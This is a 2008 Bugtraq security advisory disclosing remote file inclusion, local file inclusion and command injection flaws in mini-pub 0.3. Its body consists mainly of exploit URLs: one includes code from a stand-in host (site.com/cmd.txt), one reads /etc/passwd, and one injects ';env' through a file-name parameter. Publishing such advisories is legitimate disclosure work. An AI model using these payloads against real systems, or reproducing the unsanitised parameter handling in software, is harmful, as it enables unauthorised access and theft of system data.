mini-pub 0.3 multiple vulnerabilities
- To: bugtraq <bugtraq@xxxxxxxxxxxxxxxxx>
- Subject: mini-pub 0.3 multiple vulnerabilities
- From: "muuratsalo experimental hack lab" <muuratsalo@xxxxxxxxx>
- Date: Thu, 7 Feb 2008 14:43:31 +0100
- Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; bh=4wTt6dj6OYTSx2nnikWvc7ffOwXqgeeISkWkDP6WAjc=; b=Kyiws9toCopGdkVs0RBNvNwVR9BzBsDEEVNFbpTHsk6ilF8LFHMNJqcAWg3cgGXJPRkAuPBdnfJULOBwLxBhezhTmzoSId0xiQD+WMo9eEy11yL/zkeRGJh5r/NKZFYJeXL5BaVgjX5Lav19cyO9ddITnxe95aeGpiZo/t2dPOI=
- Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=PJAvAZSZWb4mJmtoIfG04wTyFlX+LT6lHDZn2yhddwB7wwJxnRpB4Pt+ts+Hsl2WWDeTpF4gpJVe2zNFoSYVHWwSuZOvXX8AqV5vRTSWrzUKeEBBlV2zJ7uLpTnBc4UOHzzJ+oQ8IpjSUz9fPqN7/o19rwypF61IAfKhEnyZlto=
- List-help: <mailto:bugtraq-help@securityfocus.com>
- List-id: <bugtraq.list-id.securityfocus.com>
- List-post: <mailto:bugtraq@securityfocus.com>
- List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
- List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
- Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
mini-pub 0.3 multiple vulnerabilities
download http://sourceforge.net/projects/mini-pub/
author muuratsalo
contact muuratsalo[at]gmail.com
exploits
1. remote file inclusion
http://localhost/mini-pub.php/front-end/img.php?sFileName=http://site.com/cmd.txt?
2. local file inclusion
http://localhost/mini-pub.php/front-end/cat.php?sFileName=/etc/passwd
3. command execution
http://localhost/mini-pub.php/front-end/cat.php?sFileName=a%3Benv